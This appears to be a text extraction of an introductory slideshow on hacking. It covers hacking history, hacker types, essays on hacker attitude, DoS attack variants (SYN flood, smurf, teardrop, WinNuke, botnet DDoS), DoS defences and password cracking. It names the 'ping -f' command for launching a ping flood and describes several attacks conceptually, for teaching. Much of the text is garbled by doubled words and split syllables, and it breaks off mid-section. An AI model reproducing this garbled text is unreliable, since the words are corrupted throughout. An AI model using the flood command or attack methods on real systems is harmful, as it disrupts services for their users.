Hacking
Cli ck To To En ter The Vent ure
1
2
Index
•
•
•
•
•
•
•
•
Evolution Hacking Hacking Introduction To- Cyber Crime Special Attraction Viruses Hacking XP Glossary Prepared By
Back 3
4
Evolution of Hacking Astonishingly, hacking did not instigate as an antisociety activity. The entire story of hacking started with the belief that there is always more than one way to solve a problem. People also wanted to admittance the information free of cost at any time.
Computer hacking started in the late 1950s. Before that, computers and programming languages were not easily easily reached. Problems were solved by repeating known and successful computing methods. To Work on computers, people needed formal problems and predesigned solutions. Computers were allotted to professionals based on priority of their requ requir irem emen ents ts.. Th Thee rest restri rict cted ed use use of compu compute terr reso resour urce cess redu reduce ced d the the chanc chances es for for any experiments with early computers. The authorities of Massachusetts Institute of Technology (MIT) allowed people to access their TX-0 resources without any restrictions after official hours. That was the first time when computer users got a chance to experiment with different methods for solving problems. In other words, that was the beginning of the hacker community. However, the prime aim of those hackers was to experiment with new solutions without any malevolent intent. The earlier hackers performed their activities with a strong belief that there is always a space for enhancement. They performed their activities without any predefined structure and time schedules. In parallel to the computers hacking activities, a new type of hackers, phreaks, came into into existe existence. nce. Phreaks Phreaks first first access accessed ed telepho telephone ne networ networks ks by using using handhel handheld d electr electroni onicc devices. Phreaks used those devices to make modifications to pay telephones to make free telephone calls. To try to be like payments in pay telephones, they used devices, such as red boxes. In the the early early 198 1980s 0s,, a new compu computi ting ng era era star starte ted d by conn connect ectin ing g comput computer erss and telephone networks with the help of modems. Personal computers became popular. Users started to use modems and telephone networks to connect personal computers and mainframe computers. The access to the computers connected to the internet opened the entire world of computers to the hackers community. The rapid growth of the internet technologies changed the profile of hackers.
Back 5
6
Index
•
What Is Hacking?
•
How Do Hackers Hack?
•
Classes Of Hacker
•
How To Became Hacker ?
•
Common Hacking Techniques
•
Passwords
•
Sniffers: Basics and Detection
7
Back
8
9
What is Hacking? Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.
What are Hackers? Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Such a definition presents the term in a more positive light than is usually associated with the term. Most people understand a hacker to be what is more accurately known as a 'cracker'
What are Crackers? Cracke Crackers rs are people who try to gain gain unauth unauthori orized zed access access to comput computers ers.. This This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for a ccessing a computer.
What damage can a Hacker do? This This depends depends upon what what backdoo backdoorr program program(s) (s) are hiding hiding on your your PC. Diff Differe erent nt programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information
Back
10
11
How do Hackers hack? There are many ways in which a hacker can hack. Some are as follows – * NetBIOS * ICMP Ping * FTP * rpc.statd * HTTP
NetBIOS NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor backdoor program running on your computer. computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely.
ICMP ‘Ping’ (Internet Control Message Protocol) ICMP is one of the main protocols that make the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer.
FTP (File Transfer Protocol) FTP is a standard Internet protocol, standing for File Transfer Protocol. You You may use it for file downloads from some websites. If you have a web page of your own, you may use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... hackers... FTP normally normally requires some form of authentication authentication for access to private private files, or for writing to files FTP backdoor programs, such as* Doly Trojan 12
* Fore * Blade Runner simply turn your computer into an FTP server, without any authentication.
Rpc.Statd This is a problem specific to Linux and Unix. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds.
HTTP HTTP stands for HyperText Transfer Protocol.. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, part of the request gets written written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server.
Back
13
14
Classes of Hackers Today, it is very difficult to distinguish between hackers, crackers, and script kiddies. Therefore, hackers have been categorized into different groups based on the nature of their tricks: •
White hats
•
Black hats
•
Gray hats
White Hats White hat hackers use their skills and knowledge for good purposes. These hackers help to find out new security vulnerabilities and their solutions. White hats do not hack systems with any bad intent. They like experimenting and believe that there is always a better solution than the current one. White hat hackers always inform the vulnerabilities they discovered to the concerned security professionals weakness of that system and help the system administrator to implement better security measures is a White hat hacker.
Black Hats Black hat hackers perform their activities with bad intentions. Black hats perform illegal illegal activities, activities, such as destroyi destroying ng data, denying services to legitimate legitimate users, and defacing defacing Web sites. For example, a hacker who breaks into the network of a bank and steals thousands of dollars by transferring it to other banks is a black hat. Black hat hackers share their experiments with other crackers but not with the concerned security professionals.
Grey Hats Gray hat hackers hackers are those those people people who do not believe believe in categor categorizi izing ng hacking hacking activities as good or bad. Gray hats believe that some of the activities, which are condemned by white hats, are harmless. Gray hat hackers might share the results of their experiments with both security professionals and crackers.
15
The Hacker Ha cker Attitude Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. They're also important because becoming the kind of person who believes these things is important, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. (lots of these on alt.2600.hgackerz) So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved. Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. effort. The effort takes motivation. motivation. Successful Successful athletes get their motivation motivation from a kind of physical physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. ( so I would take it all hackers are wankers lol ).You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done. ( I agree )
2. Nobody should ever have to solve a problem twice. Creative brains are a valuable, limited resource. They shouldn't be wasted on reinventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do that get the most respect from other hackers. It's definitely OK to sell enough of it to keep you in food and rent 16
and computers. It's OK to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.)
3. Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everyb everybody ody else else (especi (especiall ally y other other hackers hackers). ). (There (There is one apparen apparentt excepti exception on to this. this. Hackers will sometimes do things that may seem repetitive or boring as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.)
4. Freedom is good. Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solvin solving g whatev whatever er proble problem m you you're 're being being fascin fascinate ated d by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers hackers.. (This (This isn't the same as fighti fighting ng all authority authority.. Childr Children en need to be guided guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like cooperation that they control. So to b ehave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence. To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. star. Becoming a hacker hac ker will take intelligence, practice, dedication, and hard work. 17
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hacker Hackerss won't won't let posers posers waste waste their their time, time, but they worship worship compete competence nce -- especi especiall ally y competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker. h acker.
Back
18
19
How To To Become B ecome A Hacker Looking Looking for advice advice on learni learning ng to crack crack passwo passwords rds,, sabota sabotage ge syste systems, ms, mangle mangle webs websit ites es,, writ writee viru viruse ses, s, and plant plant Troja rojan n hors horses es?? You came came to the the wron wrong g place place.. Looking for advice on how to learn the guts and bowels of a system or network, get inside it, and become a real expert? Maybe I can help there. How you use this knowledge is up to you. I hope you'll use it to contribute to computer science and hacking (in its good sense), not to become a cracker or vandal. This little essay is basically the answers to all the emails I get asking how to become a hacker. It's not a tutorial in and of itself. It's certainly not a guaranteed success. Just give it a try and see what happens. That said, here's where to start: Be curious
Take things apart. Look under the hood. Dig through your system directories and see what's in there. View the files with hex editors. Look inside your computer. Wander around computer stores and look at what's there. Read everything in sight
If you can afford it, buy lots of books. If you can't, spend time in libraries and online. Borrow books from friends. Go through tutorials. Read the help files on your system. If you're using Unix/Linux, read the man files. Check out the local college bookstores and libraries. And as you're reading, try things (see next paragraph). Experiment
Don't be afraid to change things, just to see what'll happen. Do this long enough, of course, and you'll wipe out your system (see next paragraph), but that's part of becoming a hacker. Try command options and switches you've never tried before. Look for option menus on programs and see what they can do. In Windows, tweak your registry and see what happens. Change settings in .INI files. In Unix, dig around in the directories where you don't normally go. On the Macintosh, play around in the system folder.
20
Make backups
If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer. Don't limit yourself
Who says a computer or network is the only place to hack? Take apart your telephone. Figure out your television (careful of the high voltage around the picture tube - if you fry yourself, it's not my fault) and VCR. Figure out how closed captioning works (that was a plug for my CaptionCentral.com Web site). Take apart your printer. Pick up the latest issues of Nuts & Volts and Midnight Engineer (you've obviously made a good start if you're reading Blacklisted! 411). Take apart the locks on your doors. Figure out how your radio works. Be insatiably curious and read voraciously. There are groups you can learn from. There are whole Web sites devoted to hacking TiVo units, for example. Get some real tools
You can't cut a board in half with a screwdriver. Well, maybe you can, but it'll take a long time. Dig around and find the proper tools for the operating systems you're using. They're out there on the Web. You can get some pretty good stuff as shareware or freeware (especially on Linux). The serious power tools often cost serious money mone y. What kinds of tools? Hex file editors. Snoopers that analyze system messages and network traffic. Compilers and APIs for programming. Scripting tools. Disk editors/formatters. Disassemblers. When you get good, write some of your own. Learn to program
If you want to be a hacker, hacker, you're going to have to learn to program. The easiest easiest way to start start depends depends on the operating operating system system you'r you'ree using. using. The choice choice of languag languagee is very individual. It's almost a religious thing. Suggest a programming language to a beginner, and someone will disagree. Heck, you'll probably get flamed for it in a newsgroup. In Unix, I'd suggest getting started with Perl. Buy a copy of the camel book (Programming Perl) and the llama book (Learning Perl). You'll have the fundamentals of programming really fast! The 21
best part is that the language itself is free. In Windows, you can get started quickly using a visual development environment like Visual Basic or Java. No matter what the system, if you want to get serious, you'll eventually need to learn C (or C++ or C# or some other variant). Real hackers know more than one programming language, anyway, because no one language is right for every task. Learn to type
Hackers spend a lot of time at their keyboards. I type 90+ wpm (according to the Mavis Beacon typing tutor). HackingWiz (of hackers.com and Hacker's Haven BBS fame) says he can type 140+ wpm. The typing tutor may be boring, but it pays pa ys off. Use real operating systems
Windows 95/98/Me is a shell on top of a 32-bit patch to a 16-bit DOS. Get some real operating systems (Linux, Windows NT, Mac OS, OS/2...) and learn them. You can't call yourself a linguist if you only know one language, and you certainly can't call yourself a hacker if you only know one OS. Linux is a hacker's dream. All the source code is freely available. Play with it, analyze it, learn it. Eventually, perhaps you can make a contribution to Linux yourself. Who knows, you might even have a chance to write your own OS. Talk to people
It's hard to learn in a vacuum. Take classes. Join users groups or computer clubs. Talk to people on IRC or newsgroups or Web boards until you find people to learn with. That can take a while. while. Every third message on newsgroups newsgroups like alt.hack* is "teach me to hack." Sigh. The best way to be accepted in any group is to contribute something. Share what you learn, and others will share with you. Do some projects
It's important to pick some projects and work until you've finished them. Learning comes from doing, and you must follow the project through start to finish to really understand it. Start really simple. Make an icon. Customize your system (the startup screen on Win95, or the prompt on Unix). Make a script that performs some common operation. Write a program that manipulates a file (try encrypting something). 22
Learn to really use the Internet
Start with the Web. Read the help for the search engines. Learn how to use Boolean searches. Build up an awesome set of bookmarks. Then move on to other Internet resources. Get on Usenet. Find some underground BBSs. Get on IRC. You'll find useful information in the strangest places. Get to the point where you can answer your own questions. It's a whole lot faster than plastering them all over various newsgroups and waiting for a serious answer. Once you've gone through these steps, go out and contribute something. The Internet was built by hackers. Linux was built by hackers. Usenet was built by hackers. Sendmail was built by hackers. Be one of the hackers that builds something.
Back
23
24
Common Hacking Techniques The Various Various Hacking H acking techniques include: •
Denial-of-service
•
Trojan Horses
•
Spoofing
•
Sniffing
•
Password Cracking
Denial-Of-Service attacks Methods of attacks
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include: • Attempts to "flood" a network, thereby preventing legitimate network traffic; • Attempt to disrupt a server by sending more requests than it can possibly handle, thereby preventing access to a service; • Attempts to prevent a particular individual from accessing a service; • Attempts to disrupt service to a specific system or person. Attacks can be directed at any network device, including attacks on routing devices and Web, Web, electronic mail, or Domain Name System servers. A DOS attack can be perpetrated in a number of ways. There are three basic types of attack: 1. Consumption of computational resources, such as bandwidth, disk space, or CPU time; 2. Disruption of configuration information, such as routing information; 3. Disruption of physical network components. In addition, the US-CERT has provided tips on the manifestations of DoS attacks: • Unusually slow network performance (opening files or accessing web sites) • Unavailability of a particular web site • Inability to access any web site • Dramatic increase in the number of o f spam emails received
25
SYN floods Main article: SYN flood A SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets are handled like a connection request, causing the server to spawn a half half-o -ope pen n conn connect ectio ion, n, by sendi sending ng back back a TCP/ TCP/SY SYNN-AC ACK K packe packet, t, and and wait waitin ing g for for an TCP/ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections consume resources on the server and limit the number of connections the server is able to make, reducing the server's ability to respond to legitimate requests until after the attack ends. When a computer wants to make a TCP/IP connection (the most common internet connection) to another computer, usually a server, an exchange of TCP/SYN and TCP/ACK packets of information occur. The computer requesting the connection, usually the client's or user's computer, sends a TCP/SYN packet which asks the server if it can connect. If the server will allow connections, it sends a TCP/SYN-ACK packet back to the client to say "Yes, you may connect" and reserves a space for the connection, waiting for the client to respond with a TCP/ACK packet detailing the specifics of its connection. In a SYN flood the address of the client is often forged so that when the server sends the go-ahead back to the client, the message is never received because the client either doesn't exist or wasn't expecting the packet and subsequently ignores it. This leaves the server with a dead connection, reserved for a client that will never respond. Usually this is done to one server many times in order to reserve all the connections for unresolved clients, which keeps legitimate clients from making connections. The classic example is that of a party. Only 50 people can be invited to a party, and invitations are available on a first-come first-serve basis. Fifty letters are sent to request invitations, but the letters all have false return addresses. The invitations are mailed to the return addresses of the request letters. Unfortunately, all of the return addresses provided were fake, so nobody, or at least nobody of interest, receives the invitations. Now, when someone actually wants to come to the party (view the website), there are no invitations left because all the invitations (connections) have been reserved for 50 supposed people who will never actually show up.
26
LAND attack Main article: LAND attack A LAND attack involves involves sending sending a spoofed spoofed TCP SYN packet (connection (connection initiation) initiation) with the target host's IP address with an open port as both source and destination. The attack causes the targeted machine to reply to itself continuously and eventually crash. ICMP floods A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on mis-configured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action ac tion such as filtering. Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.
UDP floods UDP floods include "Fraggle attacks". In a fraggle attack an attacker sends a large amount of UDP echo traffic to IP broadcast addresses, all of it hav ing a fake source address. a ddress. It is a simple rewrite of the smurf attack code.
Teardrop attack aattack ttack The Teardro eardrop p attack attack involv involves es sendin sending g IP fragme fragments nts with with overlapp overlapping ing oversiz oversized ed payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code caused the fragments to be improperly handled, crashing the operating system as a result. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to 2.0.32 and 2.1.63 are vulnerable to this attack. Application level floods On IRC, IRC floods are a common co mmon electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time. 27
Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resour resources ces.. Bandwi Bandwidth dth-sa -satur turati ating ng floods floods rely rely on the attack attacker er having having higher higher bandwid bandwidth th available than the victim; a common way of achieving this today is via Distributed Denial of Servic Service, e, employ employing ing a botnet. botnet. Other Other floods floods may use specif specific ic packet packet types types or connect connection ion requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs. A "banana attack" is another particular particular type of DoS. It involves involves redirecting redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. An attacker with access to a victim's victim's computer may slow it until it is unusable unusable or crash it by using a fork bomb. A 'Pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results results in a degraded degraded quality quality of service service and increased workload workload for the network's network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to their surreptitious nature.
Nukes Nukes are malformed or specially crafted packets. WinNuke is a type of nuke, exploiting the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data is sent to TCP port 139 of the victim machine, causing it to lock up and display a Blue Screen of Death. This attack was very popular between IRCdwelling script kiddies, due to easy availability of a user-friendly click-and-crash WinNuke program.
Distributed Distributed attack A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually a web server(s). These systems are compromised by attackers using a variety of methods. Malware can carry DDoS attack mechanisms; one of the more well known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack. 28
A system system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web. Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are comp comprom romis ised ed via via the the handl handler erss by the the atta attack cker er,, usin using g automa automate ted d rout routin ines es to expl exploi oitt vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents. Thes Th esee coll collec ecti tions ons of compr comprom omis ised ed syst system emss are are know known n as botnet botnets. s. DDoS DDoS tool toolss like like stac stachel heldr draht aht stil stilll use use clas classi sicc DoS DoS atta attack ck meth method odss cente centere red d aroun around d ip spoo spoofi fing ng and and amplification like smurf and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes. (see next section) Unlike MyDooms DDoS mechanism, botnets can be turned against any ip address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals. It is important to note the difference between a DDoS and DoS attack. If an attacker mounts a smurf attack from a single host it would be classed as a DoS attack. In fact, any attack attack against against availa availabil bility ity (e.g. (e.g. using using High-e High-ener nergy gy radioradio-fre frequen quency cy weapons weapons to render render computer equipment inoperable) would be classed as a Denial of Service attack, albeit an exot exotic ic one. one. On the the othe otherr hand hand,, if an atta attack cker er uses uses a thou thousa sand nd zomb zombie ie syst system emss to simultaneously launch smurf attacks against a remote host, this would be classed as a DDoS attack.
Reflected attack A distributed reflected denial of service attack involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. ICMP ICMP Echo Echo Requ Reques estt atta attacks cks (des (descr crib ibed ed above above)) can can be cons consid ider ered ed one one form form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis29
configured networks, thereby enticing a large number of hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Many services can be exploited to act as reflectors, some harder to block than others. DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier.
Unintentional Unintention al attack Unintentional This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of o f a news story. The result is that a signif significa icant nt propor proportio tion n of the primar primary y site's site's regula regularr users users — potent potential ially ly hundred hundredss of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. News sites and link sites — sites whose primary function is to provide links to interesting content elsewhere on the Internet — are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, Fark, Something Awful and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", "farking", "goonrushing" and "wanging"; respectively. respectively. Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have created NTP vandalism by flooding NTP servers without respecting the restrictions of client types or geographical geo graphical limitations. Incidents The first major attack involving DNS servers as reflectors occurred in January 2001. The attack was directed at the site Register.com. This attack, which forged requests for the MX records of AOL.com (to amplify the attack) lasted about a week before it could be traced back to all attacking hosts and shut off. It used a list of tens of thousands of DNS servers that was at least a year old (at the time of the attack.) In July 2002, the Honeynet Project Reverse Challenge was issued. The binary that was analyzed turned out to be yet another DDoS agent, which implemented several DNS related attacks, including an optimized form of a reflection attack...
30
Effects Effects Denial of Service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted. This is another, more complex form of the DDoS, wherein the "zombies" can be located on the target system itself, thus increasing network traffic on either side of the target. If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet conne connect ctiv ivit ity y can can also also be comp compro romi mise sed d by inco incorr rrect ectly ly conf config igur ured ed or flim flimsy sy netw networ ork k infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice. Common malware •
Stacheldraht
•
Tribe Flood Network
•
Trinoo
Prevention and response
Surviving attacks attacks The investigative process should begin immediately after the DoS attack begins. There will will be mult multip iple le phone phone calls calls,, call call backs backs,, emai emails ls,, pages pages and and faxe faxess betw betwee een n the the vict victim im organization, one's provider and others involved. It is a time consuming process, so the process should begin immediately. It has taken some very large networks with plenty of resources several hours to halt a DDoS. The easiest way to survive an attack is to have planned for the attack. Having a separate emergency block of IP addresses for critical servers with a separate route can be invaluable. A separate route (perhaps a DSL) is not that extravagant, and it can be used for load balancing or sharing under normal circumstances and switched to emergency mode in the event of an attack. Filtering is generally pretty ineffective, as the route to the filter will normally be swamped so only a trickle of traffic will survive.
31
SYN Cookies Cookies SYN cookies modify the TCP protocol handling of the server by delaying allocation of resources until the client address has been verified. This seems to be the most powerful defens defensee against against SYN attacks attacks.. There There are solari solariss and Linux Linux implem implement entati ations ons.. The linux linux implementation can be turned on during runtime of the linux kernel.
Firewalls Firewalls Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses. DoS attacks are too complex for today's firewalls. E.g. if there is an attack on port 80 (web service), firewalls cannot prevent that attack because they cannot distinguish good traffic from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy. Your router may be affected even before the firewall gets the traffic. Modern stateful firewalls like Check Point FW1 NGX & Cisco PIX have a built-in capability to differentiate good traffic from DoS attack traffic. This capability is known as a "Defender", as it confirms TCP connections are valid before proxying TCP packets to service networks (including border routers).
Switches Most switches have some rate-limiting and ACL capability. Some switches provide automatic and or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN WAN Link failover and balancing. These schemes will work as long as the DoS attacks are something that can be prevented using them. For example SYN flood can be prevented using delayed binding or TCP splicing. Similarly content based DoS can be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering can work as long as you have set rate-thresholds correctly and granularly. Wan-link failover will work as long as both links have DoS/DDoS prevention mechanism.
32
Routers Similar to switches, routers have some rate-limiting and ACL capability. They too are manually set. Most routers can be easily overwhelmed under DoS attack. If you add rules to take flow statistics out of the router during the DoS attacks, they further slow down and complicate the matter. Cisco IOS has features that prevents flooding, i.e. example settings
Application front end hardware Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors. Hardware acceleration is key to bandwidth management. Look for granularity of bandwidth management, hardware acceleration, and automation while selecting an appliance.
IPS based prevention Intrusion-prevention systems are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. IPS systems which work on content recognition cannot block behavior based DoS attacks. An ASIC based IPS can detect and block denial of service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way. A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern and determine if there is traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.
Back
33
34
Passwords Passwords to access computer systems are usually stored, typically not in cleartext form, in a database so the system can perform password verification when users attempt to login. To preserve confidentiality of system passwords, the password verification data is typically generated by applying a one-way function to the password, possibly in combination with other data. For simplicity in this discussion, when the one-way function (which may be either an encryption function or cryptographic hash) does not incorporate a secret key, other than the password, we will refer to the one way function employed as a hash and its output as a hashed password. Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess, and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly and the attacker can test guesses repeatedly with different guesses until one succeeds, meaning the plaintext password has been recovered. The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords. Password cracking requires that an attacker can gain access to a hashed password, either by reading the password verification database (e.g., via a Trojan Horse, virus program, or social engineering) or intercepting a hashed password sent over an open network, or has some other way to rapidly and without limit test whether a guessed password is correct. Without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However well designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded. With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances for cracking at least one is quite high. There There are also also many other ways ways of obtain obtaining ing passwo passwords rds illici illicitly tly,, such such as social social engineering, engineering, wiretapping, wiretapping, keystroke keystroke logging, logging, login spoofing, spoofing, dumpster dumpster diving, diving, phishing, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, identity management system attacks and compro compromis mising ing host host securi security ty (see (see passwo password rd for detail details). s). However However,, crackin cracking g usuall usually y designates a guessing attack. 35
Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed passw password ord to an eavesdr eavesdroppe opperr, who can then then crack crack the passwo password. rd. A number number of stronge stronger r cryptographic protocols exist that do not expose hashed-passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zeroknowledge password proof.
Principal attack methods Weak encryption If a system uses a cryptographically weak function to hash or encrypt passwords, exploiting that weakness can recover even 'well-chosen' passwords. Decryption need not be a quick operation, and can be conducted while not connected to the target system. Any 'cracking' technique of this kind is considered successful if it can decrypt the password in fewer operations operations than would be required by a brute force attack (see below). The fewer operations operations required, the "weaker" the encryption is considered to be (for equivalently well chosen passwords). One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Progress in cryptography has made available functions which are believed to actually be "one way" hashes, such as MD5 or SHA-1. These are thought to be impossible to invert in practice. When quality implementations of good cryptographic hash functions are correctly used for authentication, password cracking through decryption can be considered infeasible.
